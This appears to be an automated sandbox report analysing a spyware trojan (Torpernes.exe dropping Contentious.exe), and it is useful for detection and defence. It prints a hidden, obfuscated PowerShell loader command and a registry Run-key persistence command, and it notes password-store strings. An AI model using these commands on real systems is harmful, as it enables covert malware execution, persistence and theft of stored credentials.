Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00405200 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405200

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Contentious.exe

Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		0_2_004031FF
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		6_2_004031FF

Creates files inside the system directory

Source: C:\Users\user\Desktop\Torpernes.exe

File created: C:\Windows\resources\0809

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_0040646E	0_2_0040646E
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_00404A3D	0_2_00404A3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0457EAD8	1_2_0457EAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0457F3A8	1_2_0457F3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0457E790	1_2_0457E790
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0040646E	6_2_0040646E
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00404A3D	6_2_00404A3D
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00156108	6_2_00156108
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015C190	6_2_0015C190
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015B328	6_2_0015B328
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015C473	6_2_0015C473
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00156730	6_2_00156730
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015C754	6_2_0015C754
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015F778	6_2_0015F778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00159858	6_2_00159858
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015CA34	6_2_0015CA34
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00154AD9	6_2_00154AD9
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015BBBA	6_2_0015BBBA
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015BEB7	6_2_0015BEB7
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015E431	6_2_0015E431
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00153578	6_2_00153578
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015D7F0	6_2_0015D7F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015D7E0	6_2_0015D7E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2042B0E0	6_2_2042B0E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2042C3EC	6_2_2042C3EC
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20514F11	6_2_20514F11
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB7588	6_2_20CB7588
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0D60	6_2_20CB0D60
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB3288	6_2_20CB3288
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF8C9	6_2_20CBF8C9
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF8D8	6_2_20CBF8D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB08F0	6_2_20CB08F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF480	6_2_20CBF480
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0491	6_2_20CB0491
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC4A8	6_2_20CBC4A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB04A0	6_2_20CB04A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC4B8	6_2_20CBC4B8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0040	6_2_20CB0040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC050	6_2_20CBC050
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC060	6_2_20CBC060
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF471	6_2_20CBF471
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBBC08	6_2_20CBBC08
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF018	6_2_20CBF018
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF028	6_2_20CBF028
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0023	6_2_20CB0023
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD1C0	6_2_20CBD1C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6DF7	6_2_20CB6DF7
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD1B0	6_2_20CBD1B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBCD58	6_2_20CBCD58
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0D50	6_2_20CB0D50
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBCD68	6_2_20CBCD68
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC901	6_2_20CBC901
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0900	6_2_20CB0900
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC910	6_2_20CBC910
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB4924	6_2_20CB4924
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDEC8	6_2_20CBDEC8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBAEEF	6_2_20CBAEEF
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB3284	6_2_20CB3284
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDEB8	6_2_20CBDEB8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDA61	6_2_20CBDA61
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB7E78	6_2_20CB7E78
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDA70	6_2_20CBDA70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD609	6_2_20CBD609
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6E00	6_2_20CB6E00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD618	6_2_20CBD618
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBEBC1	6_2_20CBEBC1
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBEBD0	6_2_20CBEBD0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBBBF8	6_2_20CBBBF8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB77A8	6_2_20CB77A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB7A0	6_2_20CBB7A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB7B0	6_2_20CBB7B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB348	6_2_20CBB348
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB358	6_2_20CBB358
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE768	6_2_20CBE768
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE778	6_2_20CBE778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBAF00	6_2_20CBAF00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE310	6_2_20CBE310
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE320	6_2_20CBE320
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23829FB0	6_2_23829FB0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382CBD0	6_2_2382CBD0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23828B00	6_2_23828B00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382BF30	6_2_2382BF30
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B290	6_2_2382B290
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238236D8	6_2_238236D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382A600	6_2_2382A600
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382D218	6_2_2382D218
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382DA48	6_2_2382DA48
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382C580	6_2_2382C580
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238285B0	6_2_238285B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820D48	6_2_23820D48
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820498	6_2_23820498
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B8E0	6_2_2382B8E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382AC48	6_2_2382AC48
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23829FA0	6_2_23829FA0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382CBC0	6_2_2382CBC0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238243D8	6_2_238243D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826FE8	6_2_23826FE8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826FF8	6_2_23826FF8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826713	6_2_23826713
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826720	6_2_23826720
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382BF20	6_2_2382BF20
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23823350	6_2_23823350
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23823360	6_2_23823360
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826B69	6_2_23826B69
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826B78	6_2_23826B78
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B281	6_2_2382B281
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238262B8	6_2_238262B8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238262C8	6_2_238262C8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382D20A	6_2_2382D20A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825A08	6_2_23825A08
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825A18	6_2_23825A18
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825E60	6_2_23825E60
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825E70	6_2_23825E70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238285A0	6_2_238285A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238255B1	6_2_238255B1
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238255C0	6_2_238255C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382A5F0	6_2_2382A5F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827D00	6_2_23827D00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825138	6_2_23825138
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825140	6_2_23825140
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23828148	6_2_23828148
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23828158	6_2_23828158
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382C570	6_2_2382C570
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820488	6_2_23820488
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827898	6_2_23827898
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238278A8	6_2_238278A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B8D0	6_2_2382B8D0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238208E1	6_2_238208E1
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238208F0	6_2_238208F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827CF0	6_2_23827CF0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820007	6_2_23820007
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382AC37	6_2_2382AC37
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382743F	6_2_2382743F
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820040	6_2_23820040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23822848	6_2_23822848
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827450	6_2_23827450
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23822858	6_2_23822858

PE / OLE file has an invalid certificate

Source: Torpernes.exe

Static PE information: invalid certificate

Uses 32bit PE files

Source: Torpernes.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/11@4/4

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_004044C2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044C2

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03

Source: C:\Users\user\Desktop\Torpernes.exe

File created: C:\Users\user\AppData\Local\Temp\nsb2E4F.tmp

Jump to behavior

Source: Torpernes.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\Torpernes.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Contentious.exe, 00000006.00000002.2944378842.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.000000002102D000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.000000002101E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Torpernes.exe

File read: C:\Users\user\Desktop\Torpernes.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Torpernes.exe "C:\Users\user\Desktop\Torpernes.exe"
Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
